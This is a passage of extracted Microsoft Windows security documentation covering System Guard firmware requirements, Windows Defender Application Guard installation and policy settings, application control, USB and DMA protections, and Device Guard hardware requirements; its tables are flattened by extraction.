Exactly the "TXT PS2" style Attributes on creation as
follows:
AuthWrite
PolicyDelete
WriteLocked
WriteDefine
AuthRead
WriteDefine
NoDa
Written
PlatformCreate
A policy of exactly PolicyCommandCode(CC =
TPM2_CC_UndefineSpaceSpecial) (SHA256 NameAlg
and Policy)
Size of exactly 70 bytes
NameAlg = SHA256
In addition, it must have been initialized and locked
(TPMA_NV_WRITTEN = 1, TPMA_NV_WRITELOCKED =
1) at time of OS launch.
PS index data DataRevocationCounters, SINITMinVersion, and
PolicyControl must all be 0x00
AUX Policy The required AUX policy must be as follows:

A = TPM2_PolicyLocality (Locality 3 & Locality 4)
B = TPM2_PolicyCommandCode
(TPM_CC_NV_UndefineSpecial)
authPolicy = {A} OR {{A} AND {B}}
authPolicy digest = 0xef, 0x9a, 0x26, 0xfc, 0x22, 0xd1,
0xae, 0x8c, 0xec, 0xff, 0x59, 0xe9, 0x48, 0x1a, 0xc1,
0xec, 0x53, 0x3d, 0xbe, 0x22, 0x8b, 0xec, 0x6d, 0x17,
0x93, 0x0f, 0x4c, 0xb2, 0xcc, 0x5b, 0x97, 0x24
Platform firmware Platform firmware must carry all code required to execute an
Intel® Trusted Execution Technology secure launch:
Intel® SINIT ACM must be carried in the OEM BIOS
Platforms must ship with a production ACM signed by
the correct production Intel® ACM signer for the
platform
Platform firmware update System firmware is recommended to be updated via

UpdateCapsule in Windows Update.
FOR QUALCOMM® PROCESSORS WITH SD850 OR LATER CHIPSETS DESCRIPTION
Monitor Mode Communication All Monitor Mode communication buffers must be

implemented in either EfiRuntimeServicesData (recommended),
data sections of EfiRuntimeServicesCode as described by the
Memory Attributes Table, EfiACPIMemoryNVS, or
EfiReservedMemoryType memory types
Monitor Mode Page Tables All Monitor Mode page tables must:
NOT contain any mappings to EfiConventionalMemory
(e.g. no OS/VMM owned memory)
They must NOT have execute and write permissions for
the same page
Platforms must only allow Monitor Mode pages
marked as executable
The memory map must report Monitor Mode as
EfiReservedMemoryType
Platforms must provide mechanism to protect the
Monitor Mode page tables from modification
Modern/Connected Standby Platforms must support Modern/Connected Standby.
Platform firmware Platform firmware must carry all code required to perform a
launch.
Platform firmware update System firmware is recommended to be updated via

UpdateCapsule in Windows Update.
Prepare to install Windows Defender Application
Guard
Applies to:
Review system requirements

NOTE
Windows Defender Application Guard is not supported on VMs and VDI environment. For testing and automation on non-
production machines, you may enable WDAG on a VM by enabling Hyper-V nested virtualization on the host.
Your environment needs the following hardware to run Windows Defender Application Guard.
HARDWARE DESCRIPTION
64-bit CPU A 64-bit computer with minimum 4 cores is required for the
hypervisor. For more info about Hyper-V, see Hyper-V on
Windows Server 2016 or Introduction to Hyper-V on
Windows 10. For more info about hypervisor, see Hypervisor
Specifications.
CPU virtualization extensions Extended page tables, also called Second Level Address
Translation (SLAT)
-AND-
One of the following virtualization extensions for VBS:
VT-x (Intel)
-OR-
AMD-V
Hardware memory Microsoft requires a minimum of 8GB RAM
Hard disk 5 GB free space, solid state disk (SSD) recommended
Input/Output Memory Management Unit (IOMMU) support Not required, but strongly recommended
Software requirements
Your environment needs the following software to run Windows Defender Application Guard.
SOFTWARE DESCRIPTION
Operating system Windows 10 Enterprise edition, version 1709 or higher

Browser Microsoft Edge and Internet Explorer
Management system Microsoft Intune

(only for managed devices)
-OR-
-OR-
Group Policy
-OR-
Your current company-wide 3rd party mobile device

management (MDM) solution. For info about 3rd party MDM
solutions, see the documentation that came with your
product.
Prepare for Windows Defender Application Guard

Before you can install and use Windows Defender Application Guard, you must determine which way you intend
to use it in your enterprise. You can use Application Guard in either Standalone or Enterprise-managed mode.
Standalone mode
Applies to:
Windows 10 Enterprise edition, version 1709 or higher
Windows 10 Pro edition, version 1803
Employees can use hardware-isolated browsing sessions without any administrator or management policy
configuration. In this mode, you must install Application Guard and then the employee must manually start
Microsoft Edge in Application Guard while browsing untrusted sites. For an example of how this works, see the
Application Guard in standalone mode testing scenario.
Enterprise-managed mode
Applies to:
Windows 10 Enterprise edition, version 1709 or higher
You and your security department can define your corporate boundaries by explicitly adding trusted domains and
by customizing the Application Guard experience to meet and enforce your needs on employee devices.
Enterprise-managed mode also automatically redirects any browser requests to add non-enterprise domain(s) in
the container.
The following diagram shows the flow between the host PC and the isolated container.
Install Application Guard
Application Guard functionality is turned off by default. However, you can quickly install it on your employee’s
devices through the Control Panel, PowerShell, or your mobile device management (MDM ) solution.
To install by using the Control Panel
1. Open the Control Panel, click Programs, and then click Turn Windows features on or off.
2. Select the check box next to Windows Defender Application Guard and then click OK.
Application Guard and its underlying dependencies are all installed.
To install by using PowerShell
NOTE
Ensure your devices have met all system requirements prior to this step. PowerShell will install the feature without checking
system requirements. If your devices don't meet the system requirements, Application Guard may not work. This step is
recommended for enterprise managed scenarios only.
1. Click the Search or Cortana icon in the Windows 10 taskbar and type PowerShell.
2. Right-click Windows PowerShell, and then click Run as administrator.
Windows PowerShell opens with administrator credentials.
3. Type the following command:
Enable-WindowsOptionalFeature -online -FeatureName Windows-Defender-ApplicationGuard
4. Restart the device.

Application Guard and its underlying dependencies are all installed.
Configure Windows Defender Application Guard
policy settings
Windows Defender Application Guard (Application Guard) works with Group Policy to help you manage your
organization's computer settings. By using Group Policy, you can configure a setting once, and then copy it onto
many computers. For example, you can set up multiple security settings in a GPO, which is linked to a domain, and
then apply all those settings to every computer in the domain.
Application Guard uses both network isolation and application-specific settings.
Network isolation settings

These settings, located at Computer Configuration\Administrative Templates\Network\Network Isolation,
help you define and manage your company's network boundaries. Application Guard uses this information to
automatically transfer any requests to access the non-corporate resources into the Application Guard container.
NOTE
You must configure either the Enterprise resource domains hosted in the cloud or Private network ranges for apps settings
on your employee devices to successfully turn on Application Guard using enterprise mode.
POLICY NAME SUPPORTED VERSIONS DESCRIPTION
Private network ranges for apps At least Windows Server 2012, A comma-separated list of IP address
Windows 8, or Windows RT ranges that are in your corporate
network. Included endpoints or
endpoints that are included within a
specified IP address range, are rendered
using Microsoft Edge and won't be
accessible from the Application Guard
environment.
Enterprise resource domains hosted in At least Windows Server 2012, A pipe-separated (|) list of your domain
the cloud Windows 8, or Windows RT cloud resources. Included endpoints are
rendered using Microsoft Edge and
won't be accessible from the Application
Guard environment. Notes: 1) Please
include a full domain name
(www.contoso.com) in the configuration
2) You may optionally use "." as a
wildcard character to automatically trust
subdomains. Configuring
".constoso.com" will automatically trust
"subdomain1.contoso.com",
"subdomain2.contoso.com" etc.
POLICY NAME SUPPORTED VERSIONS DESCRIPTION
Domains categorized as both work and At least Windows Server 2012, A comma-separated list of domain
personal Windows 8, or Windows RT names used as both work or personal
resources. Included endpoints are
rendered using Microsoft Edge and will
be accessible from the Application
Guard and regular Edge environment.
Application-specific settings
These settings, located at Computer Configuration\Administrative Templates\Windows
Components\Windows Defender Application Guard, can help you to manage your company's
implementation of Application Guard.
NAME SUPPORTED VERSIONS DESCRIPTION OPTIONS
Configure Windows Windows 10 Enterprise, Determines whether Enabled. Turns On the

Defender Application Guard 1709 or higher Application Guard can use clipboard functionality and
clipboard settings the clipboard functionality. lets you choose whether to
Windows 10 Pro, 1803 or additionally:
higher Disable the clipboard
functionality
completely when
Virtualization Security
is enabled.
Enable copying of
certain content from
Application Guard
into Microsoft Edge.
Enable copying of
certain content from
Microsoft Edge into
Application Guard.
Important
Allowing copied
content to go from
Microsoft Edge into
Application Guard
can cause potential
security risks and isn't
recommended.
Disabled or not
configured. Completely
turns Off the clipboard
functionality for Application
Guard.
Configure Windows Windows 10 Enterprise, Determines whether Enabled. Turns On the print
Defender Application Guard 1709 or higher Application Guard can use functionality and lets you
print settings the print functionality. choose whether to
Windows 10 Pro, 1803 or additionally:
higher Enable Application
Guard to print into
the XPS format.
Enable Application
Guard to print into
the PDF format.
Enable Application
Guard to print to
locally attached
printers.
Enable Application
Guard to print from
previously connected
network printers.
Employees can't
search for additional
printers.
Disabled or not
configured. Completely
turns Off the print
functionality for Application
Guard.
Block enterprise websites to Windows 10 Enterprise, Determines whether to allow Enabled. Prevents network
load non-enterprise content 1709 or higher Internet access for apps not traffic from both Internet
in IE and Edge included on the Allowed Explorer and Microsoft Edge
Apps list. to non-enterprise sites that
can't render in the
Application Guard
container.Note This may also
block assets cached by CDNs
and references to analytics
sites. Please add them to the
trusted enterprise resources
to avoid broken pages.
Disabled or not
configured. Allows
Microsoft Edge to render
network traffic to non-
enterprise sites that can't
render in Application Guard.
Allow Persistence Windows 10 Enterprise, Determines whether data Enabled. Application Guard
1709 or higher persists across different saves user-downloaded files
sessions in Windows and other items (such as,
Windows 10 Pro, 1803 or Defender Application Guard. cookies, Favorites, and so
higher on) for use in future
Application Guard sessions.
Disabled or not
configured. All user data
within Application Guard is
reset between sessions.
Note
If you later decide to stop
supporting data persistence
for your employees, you can
use our Windows-provided
utility to reset the container
and to discard any personal
data.
To reset the container:
1. Open a command-
line program and
navigate to
Windows/System32.
2. Type
wdagtool.exe
cleanup
.
The container
environment is reset,
retaining only the
employee-generated
data.
3. Type
wdagtool.exe cleanup
RESET_PERSISTENCE_LAYER
.
The container
environment is reset,
including discarding
all employee-
generated data.
Turn on Windows Defender Windows 10 Enterprise, Determines whether to turn Enabled. Turns on
Application Guard in 1709 or higher on Application Guard for Application Guard for
Enterprise Mode Microsoft Edge. Microsoft Edge, honoring
the network isolation
settings, rendering non-
enterprise domains in the
Application Guard container.
Be aware that Application
Guard won't actually be
turned On unless the
required prerequisites and
network isolation settings
are already set on the device.
Disabled. Turns Off

Application Guard, allowing
all apps to run in Microsoft
Edge.
Allow files to download to Windows 10 Enterprise, Determines whether to save Enabled. Allows users to
host operating system 1803 or higher downloaded files to the host save downloaded files from
operating system from the the Windows Defender
Windows Defender Application Guard container
Application Guard container. to the host operating
system.
Disabled or not
configured. Users are not
able to saved downloaded
files from Application Guard
to the host operating
system.
Allow hardware-accelerated Windows 10 Enterprise, Determines whether Enabled. Windows Defender

rendering for Windows 1803 or higher Windows Defender Application Guard uses
Defender Application Guard Application Guard renders Hyper-V to access
Windows 10 Pro, 1803 or graphics using hardware or supported, high-security
higher software acceleration. rendering graphics hardware
(GPUs). These GPUs improve
rendering performance and
battery life while using
Windows Defender
Application Guard,
particularly for video
playback and other graphics-
intensive use cases. If this
setting is enabled without
connecting any high-security
rendering graphics hardware,
Windows Defender
Application Guard will
automatically revert to
software-based (CPU)
rendering.
Important
Be aware that enabling
this setting with
potentially compromised
graphics devices or
drivers might pose a risk
to the host device.
Disabled or not
configured. Windows
Defender Application Guard
uses software-based (CPU)
rendering and won’t load
any third-party graphics
drivers or interact with any
connected graphics
hardware.
Allow camera and Windows 10 Enterprise, Determines whether to allow Enabled. Applications inside
microphone access in 1809 or higher camera and microphone Windows Defender
Windows Defender access inside Windows Application Guard are able
Application Guard Windows 10 Pro, 1809 or Defender Application Guard. to access the camera and
higher microphone on the user's
device.
Important
Be aware that enabling this
policy with a potentially
compromised container
could bypass camera and
microphone permissions and
access the camera and
microphone without the
user's knowledge.
Disabled or not
configured. Applications
inside Windows Defender
Application Guard are unable
to access the camera and
microphone on the user's
device.
Allow Windows Defender Windows 10 Enterprise, Determines whether Root Enabled. Certificates
Application Guard to use 1809 or higher Certificates are shared with matching the specified
Root Certificate Authorities Windows Defender thumbprint are transferred
from a user's device Windows 10 Pro, 1809 or Application Guard. into the container. Use a
higher comma to separate multiple
certificates.
Disabled or not
configured. Certificates are
not shared with Windows
Defender Application Guard.
Allow users to trust files that Windows 10 Enterprise, Determines whether users Enabled. Users are able to
open in Windows Defender 1809 or higher are able to manually trust manually trust files or trust
Application Guard untrusted files to open them files after an antivirus check.
on the host.
Disabled or not
configured. Users are
unable to manually trust files
and files continue to open in
Windows Defender
Application Guard.
Applies to:
Windows 10
Windows Server 2016
Windows Server 2019
With thousands of new malicious files created every day, using traditional methods like antivirus solutions—
signature-based detection to fight against malware—provides an inadequate defense against new attacks. In most
organizations, information is the most valuable asset, and ensuring that only approved users have access to that
information is imperative.
However, when a user runs a process, that process has the same level of access to data that the user has. As a
result, sensitive information could easily be deleted or transmitted out of the organization if a user knowingly or
unknowingly runs malicious software.
Application control is a crucial line of defense for protecting enterprises given today’s threat landscape, and it has
an inherent advantage over traditional antivirus solutions. Specifically, application control moves away from the
traditional application trust model where all applications are assumed trustworthy by default to one where
applications must earn trust in order to run. Many organizations, like the Australian Signals Directorate,
understand this and frequently cite application control as one of the most effective means for addressing the
threat of executable file-based malware (.exe, .dll, etc.).
Windows Defender Application Control (WDAC ) can help mitigate these types of security threats by restricting the
applications that users are allowed to run and the code that runs in the System Core (kernel). WDAC policies also
block unsigned scripts and MSIs, and Windows PowerShell runs in Constrained Language Mode.
NOTE
Prior to Windows 10, version 1709, Windows Defender Application Control was known as configurable code integrity
policies.
WDAC System Requirements

WDAC policies can only be created on computers beginning with Windows 10 Enterprise or Professional editions
or Windows Server 2016. They can be applied to computers running any edition of Windows 10 or Windows
Server 2016 and optionally managed via Mobile Device Management (MDM ), such as Microsoft Intune. Group
Policy or Intune can be used to distribute WDAC policies.
New and changed functionality

Prior to Windows 10, version 1709, Windows Defender Application Control was known as Windows Defender
Device Guard configurable code integrity policies.
Beginning with Windows 10, version 1703, you can use WDAC not only to control applications, but also to control
whether specific plug-ins, add-ins, and modules can run from specific apps (such as a line-of-business application
or a browser). For more information, see Use a Windows Defender Application Control policy to control specific
plug-ins, add-ins, and modules.
See also
WDAC design guide
WDAC deployment guide
How to control USB devices and other removable
media using Windows Defender ATP
Microsoft recommends a layered approach to securing removable media, and Windows Defender ATP provides
multiple monitoring and control features to help prevent threats in unauthorized peripherals from compromising
your devices:
1. Prevent threats from removable storage introduced by removable storage devices by enabling:
Windows Defender Antivirus real-time protection (RTP ) to scan removable storage for malware.
The Exploit Guard Attack Surface Reduction (ASR ) USB rule to block untrusted and unsigned processes
that run from USB.
Direct Memory Access (DMA) protection settings to mitigate DMA attacks, including Kernel DMA
Protection for Thunderbolt and blocking DMA until a user signs in.
2. Detect plug and play connected events for peripherals in Windows Defender ATP advanced hunting
Identify or investigate suspicious usage activity. Create customized alerts based on these PnP events or
any other Windows Defender ATP events with custom detection rules.
3. Respond to threats from peripherals in real-time based on properties reported by each peripheral:
Granular configuration to deny write access to removable disks and approve or deny devices by USB
vendor code, product code, device IDs, or a combination.
Flexible policy assignment of device installation settings based on an individual or group of Azure Active
Directory (Azure AD ) users and devices.
These threat reduction measures help prevent malware from coming into your environment. To protect enterprise
data from leaving your environment, you can also configure data loss prevention measures. For example, on
Windows 10 devices you can configure BitLocker and Windows Information Protection, which will encrypt
company data even if it is stored on a personal device, or use the Storage/RemovableDiskDenyWriteAccess CSP to
deny write access to removable disks. Additionally, you can classify and protect files on Windows devices (including
their mounted USB devices) by using Windows Defender ATP and Azure Information Protection.
Prevent threats from removable storage

Windows Defender ATP can help identify and block malicious files on allowed removable storage peripherals.
Enable Windows Defender Antivirus Scanning
Protecting authorized removable storage with Windows Defender Antivirus requires enabling real-time protection
or scheduling scans and configuring removable drives for scans.
If real-time protection is enabled, files are scanned before they are accessed and executed. The scanning scope
includes all files, including those on mounted removable devices such as USB drives. You can optionally run a
PowerShell script to perform a custom scan of a USB drive after it is mounted, so that Windows Defender
Antivirus starts scanning all files on a removable device once the removable device is attached. However, we
recommend enabling real-time protection for improved scanning performance, especially for large storage
devices.
If scheduled scans are used, then you need to disable the DisableRemovableDriveScanning setting (enabled by
default) to scan the removable device during a full scan. Removable devices are scanned during a quick or
custom scan regardless of the DisableRemovableDriveScanning setting.
NOTE
We recommend enabling real-time monitoring for scanning. In Intune, you can enable real-time monitoring for Windows 10
in Device Restrictions > Configure > Windows Defender Antivirus > Real-time monitoring.
Block untrusted and unsigned processes on USB peripherals

End-users might plug in removable devices that are infected with malware. To prevent infections, a company can
block USB files that are unsigned or untrusted. Alternatively, companies can leverage the audit feature of attack
surface reduction rules to monitor the activity of untrusted and unsigned processes that execute on a USB
peripheral. This can be done by setting Untrusted and unsigned processes that run from USB to either Block
or Audit only, respectively. With this rule, admins can prevent or audit unsigned or untrusted executable files from
running from USB removable drives, including SD cards. Affected file types include executable files (such as .exe,
.dll, or .scr) and script files such as a PowerShell (.ps), VisualBasic (.vbs), or JavaScript (.js) files.
These settings require enabling real-time protection.
1. Sign in to the Microsoft Azure portal.
2. Click Intune > Device configuration > Profiles > Create profile.
3. Use the following settings:

Name: Type a name for the profile
Description: Type a description
Platform: Windows 10 or later
Profile type: Endpoint protection
4. Click Configure > Windows Defender Exploit Guard > Attack Surface Reduction.
5. For Unsigned and untrusted processes that run from USB, choose Block.
6. Click OK to close Attack Surface Reduction, Windows Defender Exploit Guard, and Endpoint
protection.
7. Click Create to save the profile.
Protect against Direct Memory Access (DMA ) attacks
DMA attacks can lead to disclosure of sensitive information residing on a PC, or even injection of malware that
allows attackers to bypass the lock screen or control PCs remotely. The following settings help to prevent DMA
attacks:
1. Beginning with Windows 10 version 1803, Microsoft introduced Kernel DMA Protection for Thunderbolt to
provide native protection against DMA attacks via Thunderbolt ports. Kernel DMA Protection for
Thunderbolt is enabled by system manufacturers and cannot be turned on or off by users.
Beginning with Windows 10 version 1809, you can adjust the level of Kernel DMA Protection by configuring
the DMA Guard CSP. This is an additional control for peripherals that don't support device memory
isolation (also known as DMA-remapping). Memory isolation allows the OS to leverage the I/O Memory
Management Unit (IOMMU ) of a device to block unallowed I/O, or memory access, by the peripheral
(memory sandboxing). In other words, the OS assigns a certain memory range to the peripheral. If the
peripheral attempts to read/write to memory outside of the assigned range, the OS blocks it.
Peripherals that support device memory isolation can always connect. Peripherals that don't can be blocked,
allowed, or allowed only after the user signs in (default).
2. On Windows 10 systems that do not suppprt Kernel DMA Protection, you can:
Block DMA until a user signs in
Block all connections via the Thunderbolt ports (including USB devices)
Detect plug and play connected events

You can view plug and play connected events in Windows Defender ATP advanced hunting to identify suspicious
usage activity or perform internal investigations. For examples of Windows Defender ATP advanced hunting
queries, see the Windows Defender ATP hunting queries GitHub repo. Based on any Windows Defender ATP
event, including the plug and play events, you can create custom alerts using the Windows Defender ATP custom
detection rule feature.
Respond to threats
Windows Defender ATP can prevent USB peripherals from being used on devices to help prevent external threats.
It does this by using the properties reported by USB peripherals to determine whether or not they can be installed
and used on the device.
NOTE
Always test and refine these settings with a pilot group of users and devices first before applying them in production.
The following table describes the ways Windows Defender ATP can help prevent installation and usage of USB
peripherals. For more information about controlling USB devices, see the Microsoft Secure blog "WDATP has
protections for USB and removable devices".
CONTROL DESCRIPTION
Block installation and usage of removable storage Users can't install or use removable storage
Only allow installation and usage of specifically approved Users can only install and use approved peripherals that
peripherals report specific properties in their firmware
Prevent installation of specifically prohibited peripherals Users can't install or use prohibited peripherals that report
specific properties in their firmware
NOTE
Because an unauthorized USB peripheral can have firmware that spoofs its USB properties, we recommend only allowing
specifically approved USB peripherals and limiting the users who can access them.
Block installation and usage of removable storage

1. Sign in to the Microsoft Azure portal.
2. Click Intune > Device configuration > Profiles > Create profile.
3. Use the following settings:
Name: Type a name for the profile
Description: Type a description
Platform: Windows 10 and later
Profile type: Device restrictions
4. Click Configure > General.

5. For Removable storage and USB connection (mobile only), choose Block. Removable storage
includes USB drives, where USB connection (mobile only) excludes USB charging but includes other
USB connections on mobile devices only.
6. Click OK to close General settings and Device restrictions.
7. Click Create to save the profile.
Only allow installation and usage of specifically approved peripherals
Windows Defender ATP allows installation and usage of only specifically approved peripherals by creating a
custom profile in Intune and configuring DeviceInstallation policies. For example, this custom profile allows
installation and usage of USB devices with hardware IDs "USBSTOR\DiskVendorCo" and
"USBSTOR\DiskSanDisk_Cruzer_Glide_3.0".
Peripherals that are allowed to be installed can be specified by their hardware identity. For a list of common
identifier structures, see Device Identifier Formats. Test the configuration prior to rolling it out to ensure it blocks
and allows the devices expected. Ideally test various instances of the hardware. For example, test multiple USB keys
rather than only one.
For a SyncML example that allows installation of specific device IDs, see
DeviceInstallation/AllowInstallationOfMatchingDeviceIDs CSP. To allow specific device classes, see
DeviceInstallation/AllowInstallationOfMatchingDeviceSetupClasses CSP. Allowing installation of specific devices
requires also enabling DeviceInstallation/PreventInstallationOfDevicesNotDescribedByOtherPolicySettings.
Prevent installation of specifically prohibited peripherals
Windows Defender ATP blocks installation and usage of prohibited peripherals by using either of these options:
Administrative Templates can block any device with a matching hardware ID or setup class.
Device Installation CSP settings with a custom profile in Intune. You can prevent installation of specific device
IDs or prevent specific device classes.
Related topics
Configure real-time protection for Windows Defender Antivirus
Defender/AllowFullScanRemovableDriveScanning
Policy/DeviceInstallation CSP
Perform a custom scan of a removable device
BitLocker
Windows Information Protection
Device Guard: Windows Defender Application
Control and virtualization-based protection of code
integrity
Applies to
Windows 10
Windows Server 2016
Windows 10 includes a set of hardware and OS technologies that, when configured together, allow enterprises to
"lock down" Windows systems so they operate with many of the properties of mobile devices. In this configuration,
specific technologies work together to restrict devices to only run authorized apps by using a feature called
configurable code integrity, while simultaneously hardening the OS against kernel memory attacks through the use
of virtualization-based protection of code integrity (more specifically, HVCI).
Configurable code integrity policies and HVCI are very powerful protections that can be used separately. However,
when these two technologies are configured to work together, they present a very strong protection capability for
Windows 10 devices. This combined "configuration state" of configurable code integrity and HVCI has been
referred to as Windows Defender Device Guard.
Using configurable code integrity to restrict devices to only authorized apps has these advantages over other
solutions:
1. Configurable code integrity policy is enforced by the Windows kernel itself. As such, the policy takes effect early
in the boot sequence before nearly all other OS code and before traditional antivirus solutions run.
2. Configurable code integrity allows customers to set application control policy not only over code running in user
mode, but also kernel mode hardware and software drivers and even code that runs as part of Windows.
3. Customers can protect the configurable code integrity policy even from local administrator tampering by
digitally signing the policy. This would mean that changing the policy would require both administrative
privilege and access to the organization’s digital signing process, making it extremely difficult for an attacker
with administrative privledge, or malicious software that managed to gain administrative privilege, to alter the
application control policy.
4. The entire configurable code integrity enforcement mechanism can be protected by HVCI, where even if a
vulnerability exists in kernel mode code, the likelihood that an attacker could successfully exploit it is
significantly diminished. Why is this relevant? That’s because an attacker that compromises the kernel would
otherwise have enough privilege to disable most system defenses and override the application control policies
enforced by configurable code integrity or any other application control solution.
(Re-)Introducing Windows Defender Application Control

When we originally designed the configuration state that we have referred to as Windows Defender Device Guard,
we did so with a specific security promise in mind. Although there were no direct dependencies between the two
main OS features of the Device Guard configuration, configurable code integrity and HVCI, we intentionally
focused our discussion around the Device Guard lockdown state you achieve when deploying them together.
However, the use of the term Device Guard to describe this configuration state has unintentionally left an
impression for many IT professionals that the two features were inexorably linked and could not be deployed
separately. Additionally, given that HVCI relies on Windows virtualization-based security, it comes with additional
hardware, firmware, and kernel driver compatibility requirements that some older systems can’t meet.
As a result, many IT Professionals assumed that because some systems couldn't use HVCI, they couldn’t use
configurable code integrity either. But configurable code integrity carries no specific hardware or software
requirements other than running Windows 10, which means many IT professionals were wrongly denied the
benefits of this powerful application control capability.
Since the initial release of Windows 10, the world has witnessed numerous hacking and malware attacks where
application control alone could have prevented the attack altogether. With this in mind, we are discussing and
documenting configurable code integrity as a independent technology within our security stack and giving it a
name of its own: Windows Defender Application Control. We hope this change will help us better communicate
options for adopting application control within an organization.
Does this mean Windows Defender Device Guard configuration state is going away? Not at all. The term Device
Guard will continue to be used as a way to describe the fully locked down state achieved through the use of
Windows Defender Application Control (WDAC ), HVCI, and hardware and firmware security features. It also allows
us to work with our OEM partners to identify specifications for devices that are “Device Guard capable” so that our
joint customers can easily purchase devices that meet all of the hardware and firmware requirements of the original
"Device Guard" locked down scenario for Windows 10 based devices.
Related topics
Dropping the Hammer Down on Malware Threats with Windows 10’s Windows Defender Device Guard
Driver compatibility with Windows Defender Device Guard in Windows 10
Code integrity
Memory integrity
Applies to:
Memory integrity is a powerful system mitigation that leverages hardware virtualization and the Windows Hyper-V
hypervisor to protect Windows kernel-mode processes against the injection and execution of malicious or
unverified code. Code integrity validation is performed in a secure environment that is resistant to attack from
malicious software, and page permissions for kernel mode are set and maintained by the Hyper-V hypervisor.
Memory integrity helps block many types of malware from running on computers that run Windows 10 and
Windows Server 2016.
Baseline protections and additional qualifications for
virtualization-based protection of code integrity
Applies to
Computers must meet certain hardware, firmware, and software requirements in order to take adavantage of all of
the virtualization-based security (VBS ) features in Windows Defender Device Guard. Computers lacking these
requirements can still be protected by Windows Defender Application Control (WDAC ) policies—the difference is
that those computers will not be as hardened against certain threats.
For example, hardware that includes CPU virtualization extensions and SLAT will be hardened against malware that
attempts to gain access to the kernel, but without protected BIOS options such as “Boot only from internal hard
drive,” the computer could be booted (by a malicious person who has physical access) into an operating system on
bootable media.
WARNING
Virtualization-based protection of code integrity may be incompatible with some devices and applications. We strongly
recommend testing this configuration in your lab before enabling virtualization-based protection of code integrity on
production systems. Failure to do so may result in unexpected failures up to and including data loss or a blue screen error
(also called a stop error).
The following tables provide more information about the hardware, firmware, and software required for
deployment of various Windows Defender Device Guard features. The tables describe baseline protections, plus
protections for improved security that are associated with hardware and firmware options available in 2015, 2016,
and 2017.
NOTE
Beginning with Windows 10, version 1607, Trusted Platform Module (TPM 2.0) must be enabled by default on new
computers.
Baseline protections
BASELINE PROTECTIONS DESCRIPTION SECURITY BENEFITS
Hardware: 64-bit CPU A 64-bit computer is required for the

Windows hypervisor to provide VBS.
BASELINE PROTECTIONS DESCRIPTION SECURITY BENEFITS
Hardware: CPU virtualization These hardware features are required VBS provides isolation of the secure
extensions, for VBS: kernel from the normal operating
plus extended page tables One of the following virtualization system. Vulnerabilities and zero-days in
extensions: the normal operating system cannot be
• VT-x (Intel) or exploited because of this isolation.
• AMD-V
And:
• Extended page tables, also called
Second Level Address Translation (SLAT).
Firmware: UEFI firmware version See the UEFI Secure Boot helps ensure that the
2.3.1.c or higher with UEFI Secure System.Fundamentals.Firmware.UEFISec device boots only authorized code. This
Boot ureBoot requirement in the Windows can prevent boot kits and root kits from
Hardware Compatibility Specifications installing and persisting across reboots.
for Windows 10, version 1809 and
Windows Server 2019 - Systems
download. You can find previous
versions of the Windows Hardware
Compatibility Program Specifications
and Policies here.
Firmware: Secure firmware update UEFI firmware must support secure UEFI firmware just like software can
process firmware update found under the have security vulnerabilities that, when
System.Fundamentals.Firmware.UEFISec found, need to be patched through
ureBoot requirement in the Windows firmware updates. Patching helps
Hardware Compatibility Specifications prevent root kits from getting installed.
for Windows 10, version 1809 and
Windows Server 2019 - Systems
download. You can find previous
versions of the Windows Hardware
and Policies here.
Software: HVCI compatible drivers See the HVCI Compatible drivers help ensure
Filter.Driver.DeviceGuard.DriverCompati that VBS can maintain appropriate
bility requirement in the Windows memory permissions. This increases
Hardware Compatibility Specifications resistance to bypassing vulnerable
for Windows 10, version 1809 and kernel drivers and helps ensure that
Windows Server 2019 - Filter driver malware cannot run in kernel. Only code
download. You can find previous verified through code integrity can run
versions of the Windows Hardware in kernel mode.
and Policies here.
Software: Qualified Windows Windows 10 Enterprise, Windows 10 Support for VBS and for management
operating system Education, Windows Server 2016, or features that simplify configuration of
Windows 10 IoT Enterprise Windows Defender Device Guard.
Important:
Windows Server 2016 running
as a domain controller does not
support Windows Defender
Credential Guard. Only
virtualization-based protection
of code integrity is supported in
this configuration.
Important The following tables list additional qualifications for improved security. You can use Windows
Defender Device Guard with hardware, firmware, and software that support baseline protections, even if they
do not support protections for improved security. However, we strongly recommend meeting these additional
qualifications to significantly strengthen the level of security that Windows Defender Device Guard can provide.
Additional qualifications for improved security

The following tables describe additional hardware and firmware qualifications, and the improved security that is
available when these qualifications are met.
Additional security qualifications starting with Windows 10, version 1507, and Windows Server 2016, Technical
Preview 4
PROTECTIONS FOR IMPROVED SECURITY DESCRIPTION SECURITY BENEFITS
Firmware: Securing Boot • BIOS password or stronger • BIOS password or stronger

Configuration and Management authentication must be supported. authentication helps ensure that only
• In the BIOS configuration, BIOS authenticated Platform BIOS
authentication must be set. administrators can change BIOS
• There must be support for protected settings. This helps protect against a
BIOS option to configure list of physically present user with BIOS access.
permitted boot devices (for example, • Boot order when locked provides
“Boot only from internal hard drive”) protection against the computer being
and boot device order, overriding booted into WinRE or another operating
BOOTORDER modification made by system on bootable media.
operating system.
• In the BIOS configuration, BIOS
options related to security and boot
options (list of permitted boot devices,
boot order) must be secured to prevent
other operating systems from starting
and to prevent changes to the BIOS
settings.
Additional security qualifications starting with Windows 10, version 1607, and Windows Server 2016
Firmware: Hardware Rooted Trust • Boot Integrity (Platform Secure Boot) • Boot Integrity (Platform Secure Boot)
Platform Secure Boot must be supported. See the from Power-On provides protections
System.Fundamentals.Firmware.CS.UEFI against physically present attackers, and
SecureBoot.ConnectedStandby defense-in-depth against malware.
requirement in the Windows Hardware • HSTI 1.1.a provides additional security
Compatibility Specifications for Windows assurance for correctly secured silicon
10, version 1809 and Windows Server and platform.
2019 - Systems download. You can find
previous versions of the Windows
Hardware Compatibility Program
Specifications and Policies here.
• The Hardware Security Test Interface
(HSTI) 1.1.a must be implemented. See
Hardware Security Testability
Specification.
Firmware: Firmware Update through Firmware must support field updates Helps ensure that firmware updates are
Windows Update through Windows Update and UEFI fast, secure, and reliable.
encapsulation update.
Firmware: Securing Boot • Required BIOS capabilities: Ability of • Enterprises can choose to allow
Configuration and Management OEM to add ISV, OEM, or Enterprise proprietary EFI drivers/applications to
Certificate in Secure Boot DB at run.
manufacturing time. • Removing Microsoft UEFI CA from
• Required configurations: Microsoft Secure Boot DB provides full control to
UEFI CA must be removed from Secure enterprises over software that runs
Boot DB. Support for 3rd-party UEFI before the operating system boots.
modules is permitted but should
leverage ISV-provided certificates or
OEM certificate for the specific UEFI
software.
Additional security qualifications starting with Windows 10, version 1703

Firmware: VBS enablement of NX • VBS will enable No-Execute (NX) • Vulnerabilities in UEFI runtime, if any,
protection for UEFI runtime services protection on UEFI runtime service code will be blocked from compromising VBS
and data memory regions. UEFI runtime (such as in functions like UpdateCapsule
